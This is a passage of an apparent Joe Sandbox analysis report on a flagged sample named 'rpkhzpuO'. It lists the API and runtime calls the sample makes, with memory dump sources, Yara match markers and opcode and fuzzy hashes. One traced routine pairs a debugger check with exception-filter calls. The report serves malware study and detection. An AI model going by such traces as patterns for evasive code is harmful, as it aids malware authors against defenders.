                                                                                                                              • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                              • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                                                              APIs
                                                                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 10892065-0
                                                                                                                              • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                              • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                              • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                              • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                                                              APIs
                                                                                                                              • _doexit.LIBCMT ref: 0040EA16
                                                                                                                                • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                                                                                                                • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                                                                                                                • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                                                                                                                • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                                                                                                                • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                                                                                                                • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                                                                                                                • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                                                                                                                • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1597249276-0
                                                                                                                              • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                              • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                                                                                                                              • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                              • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 283 252b9308-252b9377 CloseHandle 286 252b9379-252b937f 283->286 287 252b9380-252b93a5 283->287 286->287
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2265355175.00000000252B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 252B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_252b0000_rpkhzpuO.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2962429428-0
                                                                                                                              • Opcode ID: 2b80a635f7aa81559a2a2e392d0e360093e3d18894ac9b7ac51e5b30b59f837c
                                                                                                                              • Instruction ID: a7b7c1a0221e68c002d3ae06f8536d89fa851929a316f12377960fddb672cd4d
                                                                                                                              • Opcode Fuzzy Hash: 2b80a635f7aa81559a2a2e392d0e360093e3d18894ac9b7ac51e5b30b59f837c
                                                                                                                              • Instruction Fuzzy Hash: EB1136B1D003498FDB14DFAAD8857DEFBF4AF88620F24851AD519A7280D779A940CBA4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2259896343.00000000250BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 250BD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_250bd000_rpkhzpuO.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5bdae6005d28601a66b9fcec440f8357510f6e8502526a64898ab44a7168330c
                                                                                                                              • Instruction ID: c967e60ad895c3f594a8279d3f4e71fc0914edd64bb3be2791983e5b655243dc
                                                                                                                              • Opcode Fuzzy Hash: 5bdae6005d28601a66b9fcec440f8357510f6e8502526a64898ab44a7168330c
                                                                                                                              • Instruction Fuzzy Hash: 7D212876544204DFDB04DF14EEC0F4AFFA6FB88314F2481A9E9080B246D376E856CAE1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2259896343.00000000250BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 250BD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_250bd000_rpkhzpuO.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c2efa6edaeff810cf91d4dda5e4be1892b31d49c18979fec4a7f70f90758fb81
                                                                                                                              • Instruction ID: c579f2c89541273dedbf2760e098a1be38236b5a2bd287de488b902ca91aebd1
                                                                                                                              • Opcode Fuzzy Hash: c2efa6edaeff810cf91d4dda5e4be1892b31d49c18979fec4a7f70f90758fb81
                                                                                                                              • Instruction Fuzzy Hash: 542103B6504244DFDB05DF14E9C0F0AFFA6FB88310F248569E9090B256C3B6E856CAA1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2259896343.00000000250BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 250BD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_250bd000_rpkhzpuO.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7e19b8849574f69084d3a2b900cad5df28e11347f1f339390478c48b27048c21
                                                                                                                              • Instruction ID: dd914a666a35be8eafa6c8dda5ee1eb1303b78e875b9560b41a921cf9abaf0ea
                                                                                                                              • Opcode Fuzzy Hash: 7e19b8849574f69084d3a2b900cad5df28e11347f1f339390478c48b27048c21
                                                                                                                              • Instruction Fuzzy Hash: CC11AF76504284CFCB01DF10D9C0B06FFB2FB88314F2486A9D8490B257C37AE55ACBA1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2259896343.00000000250BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 250BD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_250bd000_rpkhzpuO.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7e19b8849574f69084d3a2b900cad5df28e11347f1f339390478c48b27048c21
                                                                                                                              • Instruction ID: 77238a04f86523b5f2606b2e85158a77c9498abbfe18fa2ce78f308d1c5d1f6a
                                                                                                                              • Opcode Fuzzy Hash: 7e19b8849574f69084d3a2b900cad5df28e11347f1f339390478c48b27048c21
                                                                                                                              • Instruction Fuzzy Hash: 0A11AF76544244DFCB05DF10DAC4B46FFA2FB84314F2486A9D8090B256C37AE55ACBA2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2259896343.00000000250BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 250BD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_250bd000_rpkhzpuO.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e6397734ca8e0b6b2fba9bf1796318bfd57d54680722bb9475f1d21d9b38209c
                                                                                                                              • Instruction ID: d0e75af3eb301f3187d001ff5d72ea0b7c5d1bb17ac0700d3f67c4307040a8ce
                                                                                                                              • Opcode Fuzzy Hash: e6397734ca8e0b6b2fba9bf1796318bfd57d54680722bb9475f1d21d9b38209c
                                                                                                                              • Instruction Fuzzy Hash: B30152724093C49FE7124B25DC94752FFE8EF42624F19859BE9488F193C2696C45C771
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2259896343.00000000250BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 250BD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_250bd000_rpkhzpuO.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c3c55c2d3e1a4e27afbced335cc94bab0034148599eceec267dc2d9dc1953f42
                                                                                                                              • Instruction ID: b994bfe8e4c87a06f0f78fb946d7579f1621fd007516ebefd5a9d1952b7a150b
                                                                                                                              • Opcode Fuzzy Hash: c3c55c2d3e1a4e27afbced335cc94bab0034148599eceec267dc2d9dc1953f42
                                                                                                                              • Instruction Fuzzy Hash: 0C01A7724053449AE7108B15EDC0F56FFD8EF41764F58856AEE484A242C3B9BD45C6B1
                                                                                                                              APIs
                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                              • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2209421224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000008.00000002.2209421224.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000008.00000002.2209421224.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2579439406-0
                                                                                                                              • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                              • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                              • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                              • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                              APIs
                                                                                                                              • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2209421224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000008.00000002.2209421224.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000008.00000002.2209421224.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$FreeProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3859560861-0
                                                                                                                              • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                              • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                              • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                              • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                              APIs
                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2209421224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000008.00000002.2209421224.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000008.00000002.2209421224.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3192549508-0
                                                                                                                              • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                              • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                                                                              • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                              • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                                                                              APIs
                                                                                                                              • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                              • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00000000), ref: 004170C5
                                                                                                                              • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                              • _malloc.LIBCMT ref: 0041718A
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                              • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                              • _malloc.LIBCMT ref: 0041724C
                                                                                                                              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                              • __freea.LIBCMT ref: 004172A4
                                                                                                                              • __freea.LIBCMT ref: 004172AD
                                                                                                                              • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                              • ___convertcp.LIBCMT ref: 00417309
                                                                                                                              • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                              • _malloc.LIBCMT ref: 00417362
                                                                                                                              • _memset.LIBCMT ref: 00417384
                                                                                                                              • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                              • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                              • __freea.LIBCMT ref: 004173CF
                                                                                                                              • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3809854901-0
                                                                                                                              • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                              • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                              • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                              • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                              APIs
                                                                                                                              • _malloc.LIBCMT ref: 004057DE
                                                                                                                                • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                              • _malloc.LIBCMT ref: 00405842
                                                                                                                              • _malloc.LIBCMT ref: 00405906
                                                                                                                              • _malloc.LIBCMT ref: 00405930
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _malloc$AllocateHeap
                                                                                                                              • String ID: 1.2.3
                                                                                                                              • API String ID: 680241177-2310465506
                                                                                                                              • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                              • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                              • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                              • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3886058894-0
                                                                                                                              • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                              • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                              • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                              • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                              APIs
                                                                                                                              • EntryPoint.RPKHZPUO(80070057), ref: 004017EE
                                                                                                                                • Part of subcall function 00401030: RaiseException.KERNEL32(?,00000001,00000000,00000000,00000015,-30B19E70,2C2D8410), ref: 0040101C
                                                                                                                                • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
                                                                                                                              • EntryPoint.RPKHZPUO(80070057), ref: 00401800
                                                                                                                              • EntryPoint.RPKHZPUO(80070057), ref: 00401813
                                                                                                                              • __recalloc.LIBCMT ref: 00401828
                                                                                                                              • EntryPoint.RPKHZPUO(8007000E), ref: 00401839
                                                                                                                              • EntryPoint.RPKHZPUO(8007000E), ref: 00401853
                                                                                                                              • _calloc.LIBCMT ref: 00401861
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1721462702-0
                                                                                                                              • Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                              • Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
                                                                                                                              • Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                              • Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE
                                                                                                                              APIs
                                                                                                                              • __getptd.LIBCMT ref: 00414744
                                                                                                                                • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                              • __getptd.LIBCMT ref: 0041475B
                                                                                                                              • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                              • __lock.LIBCMT ref: 00414779
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                              • String ID: @.B
                                                                                                                              • API String ID: 3521780317-470711618
                                                                                                                              • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                              • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                              • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                              • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                              APIs
                                                                                                                              • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                              • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                              • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                              • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                              • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2805327698-0
                                                                                                                              • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                              • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                              • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                              • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                              APIs
                                                                                                                              • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                              • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                              • __lock.LIBCMT ref: 00414008
                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                              • InterlockedIncrement.KERNEL32(00422910), ref: 00414050
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4271482742-0
                                                                                                                              • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                              • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                              • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                              • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000008.00000001.2174375803.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                              • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                              • API String ID: 1646373207-3105848591
                                                                                                                              • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                              • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                              • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                              • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                              APIs
                                                                                                                              • __fileno.LIBCMT ref: 0040C77C
                                                                                                                              • __locking.LIBCMT ref: 0040C791
                                                                                                                                • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
